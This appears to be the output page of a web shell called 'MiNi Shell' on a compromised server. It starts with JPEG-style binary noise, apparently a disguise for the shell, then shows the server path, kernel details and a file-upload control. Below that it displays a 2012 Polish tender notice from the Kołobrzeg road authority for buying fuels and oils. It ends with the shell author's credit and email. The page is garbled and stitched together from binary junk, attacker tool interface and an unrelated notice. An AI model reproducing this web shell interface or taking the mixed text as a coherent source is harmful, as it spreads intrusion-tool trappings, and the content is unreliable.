JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/471806-N-2012.html

<p class="kh_header"><b>Kołobrzeg: Zakup paliw płynnych, olejów, gazu i materiałów eksploatacyjnych</b><br>
<b>Numer ogłoszenia: 471806 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Kołobrzegu , ul. Gryfitów 8, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 94 3528810, faks 94 3528810.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp.kolobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka administracyjna powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup paliw płynnych, olejów, gazu i materiałów eksploatacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Rodzaj zamówienia - dostawy.
2. Przedmiotem zamówienia jest sukcesywny zakup paliw płynnych, olejów, gazu i materiałów eksploatacyjnych w szacunkowej ilości:
1) Benzyna Pb 95 - około 1 000 l
2) Benzyna Pb 98 - około 6 500 l
3) Olej napędowy - około 60 000 l
4) Gaz samochodowy - około 1 000 l
5) Olej silnikowy Lotos Turdus 15W-40 (ON) lub równoważny - około 600 l
6) Olej silnikowy typu Mobil, Castrol 10W-40 (ON) lub równoważny - około 40 l
7) Olej silnikowy typu Mobil, Castrol 15W-40 (ON) lub równoważny - około 40 l
8) Olej silnikowy typu Mobil, Castrol 10W-40 (PB) lub równoważny - około 20 l
9) Olej silnikowy typu Mobil, Castrol 5W-40 (PB) lub równoważny - około 10 l
10) Olej silnikowy Rimula 15W-40 (ON) lub równoważny - około 25 l
11) Olej Hipol LHL 46, GL4 lub równoważny - około 500 l
12) Olej ATF Hydraulic lub równoważny - około 300 l
13) Olej Hydraulic Oil Super lub równoważny - około 200 l
14) Smar STP lub równoważny - około 280 kg
15) Płyn hamulcowy DOT - 4 lub równoważny - około 30 l
16) Płyn Petrygo lub równoważny - około 300 l
17) Gaz w butlach 11 kg - około 200 szt.

3.  Miejsce  poboru paliwa, olejów, gazu i materiałów eksploatacyjnych musi znajdować się na obszarze miasta Kołobrzeg.
4. W zależności od rzeczywistych potrzeb oraz zabezpieczonych w budżecie środków, Zamawiający może zmniejszyć lub zwiększyć szacunkowe ilości paliw, olejów, gazu i materiałów eksploatacyjnych określonych w pkt 2  Sprzedawcy nie będą przysługiwały z tego tytułu żadne roszczenie w stosunku do Zamawiającego.
5. W sytuacji, gdy po stronie Sprzedawcy nastąpi czasowa niemożność świadczenia dostaw (przerwa w dostawie paliwa), Sprzedawca zobowiązany będzie do zapewnienia ciągłości realizacji zamówienia w inny sposób (np. na innej stacji w Kołobrzegu). Z tego tytułu nie mogą wzrosnąć jednak koszty realizowanych zamówień.
6. Sprzedawca zobowiązany będzie poinformować Zamawiającego o możliwości wystąpienia sytuacji, o której mowa w pkt 5  na co najmniej 3 godziny przed przewidywanym wyczerpaniem się zasobów paliwa na stacji, wskazując jednocześnie miejsce w którym pojazdy Zamawiającego mogą zostać zatankowane na koszt Sprzedawcy na stacji paliw w Kołobrzegu.
7. Sprzedawca zapewnia właściwą jakość paliwa zgodnie z obowiązującymi normami i wymaganiami jakościowymi określonymi w rozporządzeniu Ministra Gospodarki z dnia 9 grudnia 2008 roku sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 2008 r. Nr 221, poz. 1441 z późn. zm.)
8. Strony ustalają, że wynagrodzenie ustalane będzie na podstawie uzgodnionych cen jednostkowych oraz faktycznej ilości pobranych paliw, olejów, gazu i materiałów eksploatacyjnych. 
9. Upust zagwarantowany przez Sprzedawcę w okresie obowiązywania umowy będzie stałym niezmiennym składnikiem ceny paliwa, olejów, gazu i materiałów eksploatacyjnych. 
10. Zmiana ceny za poszczególny asortyment nie wymaga zmiany niniejszej umowy.
11. Zamawiający zastrzega sobie prawo żądania wglądu do cenników obowiązujących u Sprzedawcy w celu dokonania weryfikacji prawidłowości udzielenia upustu (ustalenia, czy upust jest zgodny z ofertą).
12. Sprzedawca może podwyższyć cenę jednostkową paliw, olejów, gazu i materiałów eksploatacyjnych, w przypadku podwyżki cen tych artykułów na rynku krajowym. W przypadku obniżki cen, Sprzedawca ma obowiązek obniżenia cen.
13. Każdorazowo przy zmianie cen Sprzedawca jest obowiązany wcześniej pisemnie zawiadomić o zmianach Zamawiającego.
14. Ceny jednostkowe paliw, olejów, gazu i materiałów eksploatacyjnych ustalone na skutek podwyżki lub obniżki cen tych artykułów na rynku krajowym nie mogą być wyższe niż średnia cen tych artykułów obowiązujących na kołobrzeskich stacjach paliw.
15. Sprzedaż paliw płynnych, olejów, gazu oraz materiałów eksploatacyjnych odbywać się będzie w ten sposób, że Sprzedawca będzie wydawać ww. artykuły pracownikom Zarządu Dróg Powiatowych w Kołobrzegu na podstawie okazanej karty drogowej lub za pomocą elektronicznych kart paliwowych uprawniających do dokonywania zakupów bezgotówkowych.
16. W przypadku korzystania z elektronicznych kart:
1) Sprzedawca zobowiązany będzie do wystawienia:
- kart do bezgotówkowego tankowania dla każdego pojazdu, maszyny, urządzenia Zamawiającego według zestawienia sporządzonego przez Zamawiającego, w terminie 7 dni od dnia zawarcia umowy,
- jednej karty, która wraz z imiennym upoważnieniem wystawionym przez Dyrektora ZDP w Kołobrzegu będzie uprawniała do zakupu materiałów eksploatacyjnych, określonych w pkt 2 od nr 5-17, w terminie 7 dni od dnia zawarcia umowy,
- gdy nastąpi awaria bądź utrata karty, zwiększenie liczby posiadanych samochodów lub wymiana floty samochodowej, Sprzedawca zobowiązany będzie do wystawienia kart dodatkowych lub zamiennych i dostarczenia bezpłatnie Zamawiającemu, w terminie 15 dni od daty zgłoszenia ww. zdarzeń drogą elektroniczną lub faksem;
2) każdy zakup zostanie udokumentowany potwierdzeniem z terminala;
3) do każdej faktury Sprzedawca załączy zestawienie zawierające co najmniej:
- numer karty elektronicznej na którą dokonano zakupów, 
- numer rejestracyjny pojazdu,
- nazwę miejscowości i datę transakcji na kartę elektroniczną,
- nazwy zakupionych paliw, olejów, gazu i materiałów eksploatacyjnych,
- ilości i ceny zakupionych paliw, olejów, gazu i materiałów eksploatacyjnych,
- wartość (netto i brutto) zakupionych paliw, olejów, gazu i materiałów eksploatacyjnych.
4) faktura powinna zawierać informację o wysokości stałego upustu, jeżeli jest stosowany.
17) W przypadku zastosowania kart drogowych:
1) Sprzedawca w karcie drogowej wpisywał będzie ilości pobranych artykułów;
2) pobranie paliw, olejów, gazu i materiałów eksploatacyjnych pracownik ZDP będzie kwitował Sprzedawcy własnoręcznym podpisem na druku Magazyn wyda;
3) sprzedaż materiałów eksploatacyjnych określonych pkt 2 od nr 5-17 dokonywana będzie wyłącznie pracownikowi ZDP w Kołobrzegu legitymującemu się imiennym upoważnieniem wystawionym przez Dyrektora ZDP w Kołobrzegu,
4) podpisany i opieczętowany przez osoby wymienione w pkt 1) i 2) druk Magazyn wyda będzie dokumentem upoważniającym Sprzedawcę do wystawienia faktury;
5) do każdej faktury Sprzedawca załączy zestawienie zawierające co najmniej:
- datę poboru paliwa, olejów, gazu i materiałów eksploatacyjnych,
- ilość i rodzaj pobranego paliwa, oleju, gazu i materiałów eksploatacyjnych,
- w przypadku tankowania nr rejestracyjny pojazdu,
- pokwitowanie odbioru i datę,
- podpis wydającego,
- wartość (netto i brutto) zakupionych paliw, olejów, gazu i materiałów eksploatacyjnych.
6) faktura powinna zawierać informację o wysokości stałego upustu, jeżeli jest stosowany. 
18. Rozliczenie za pobrane paliwa, oleje, gaz i materiały eksploatacyjne odbywać się będzie nie częściej niż jeden raz w tygodniu. Sprzedawca wystawiać będzie fakturę VAT i dostarczać ją będzie Zamawiającemu. Zapłata wynagrodzenia następować będzie w ciągu 30 dni od dnia otrzymania faktury przez Zamawiającego przelewem na konto Sprzedawcy. Do faktury Sprzedawca dołącza dokument wymieniony:
1) w pkt 16 ppkt 3 - w przypadku korzystania z elektronicznych kart paliwowych, lub
2) w pkt 17 ppkt 5 - w przypadku korzystania z kart drogowych. 
19) Koszty związane z obsługą elektronicznych kart paliwowych w całym okresie realizacji zamówienia ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 7) ustawy. Zamówienie uzupełniające może zostać udzielone w okresie 3 lat od udzielenia zamówienia podstawowego, o wartości nie przekraczającej 20% wartości zamówienia podstawowego, polegającego na powtórzeniu tego samego rodzaju zamówień i zgodnego z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8, 09.13.42.00-9, 09.13.30.00-0, 09.21.11.00-2, 09.21.00.00-4, 24.96.10.00-8, 09.21.16.10-0, 09.21.16.50-2, 09.12.20.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać aktualną Koncesję na obrót paliwami, zgodnie z wymogami ustawy z dnia 10 kwietnia 1997 r. Prawo Energetyczne (Dz. U. z 2006 r., nr 89, poz. 625  z późn. zm.)
- Ocena spełnienia wyżej wymienionego warunku udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia / nie spełnia - na podstawie dokumentów i oświadczeń dołączonych przez wykonawcę do wniosku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.
- Ocena spełnienia wyżej wymienionego warunku udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia / nie spełnia - na podstawie dokumentów i oświadczeń dołączonych przez wykonawcę do wniosku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.
- Ocena spełnienia wyżej wymienionego warunku udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia / nie spełnia - na podstawie dokumentów i oświadczeń dołączonych przez wykonawcę do wniosku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.
- Ocena spełnienia wyżej wymienionego warunku udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia / nie spełnia - na podstawie dokumentów i oświadczeń dołączonych przez wykonawcę do wniosku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.
- Ocena spełnienia wyżej wymienionego warunku udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia / nie spełnia - na podstawie dokumentów i oświadczeń dołączonych przez wykonawcę do wniosku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy (druk w załączeniu do SIWZ - formularz 3.2)
2) Formularz oferty (druk w załączeniu do SIWZ - formularz 3.3).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdp.kolobrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Kołobrzegu, ul. Gryfitów 8, 78-100 Kołobrzeg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2012 godzina 11:00, miejsce: Sekretariat Zarządu Dróg Powiatowych w Kołobrzegu, ul. Gryfitów 8, 78-100 Kołobrzeg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com